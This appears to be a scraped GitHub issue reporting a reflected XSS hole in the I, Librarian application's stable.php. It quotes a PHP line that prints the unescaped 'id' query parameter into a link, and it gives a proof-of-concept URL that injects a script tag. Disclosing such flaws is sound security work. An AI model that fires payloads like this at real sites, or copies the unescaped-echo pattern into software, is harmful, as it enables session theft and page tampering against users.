Skip to content
This repository was archived by the owner on Jan 27, 2023. It is now read-only.
This repository was archived by the owner on Jan 27, 2023. It is now read-only.

Reflected XSS vulnerability #119

Closed
Closed
@xssssrf

Description

@xssssrf

<a href="<?php print IL_URL; ?>?id=<?php print $_GET['id']; ?>" style="display:block">

When $stablelinks == '1' at ilibrarian-default.ini,it could cause a reflective XSS.

POC:
http://localhost/Librarian/stable.php?id="/><script>confirm(document.domain)</script>

Metadata

Metadata

Assignees

Labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions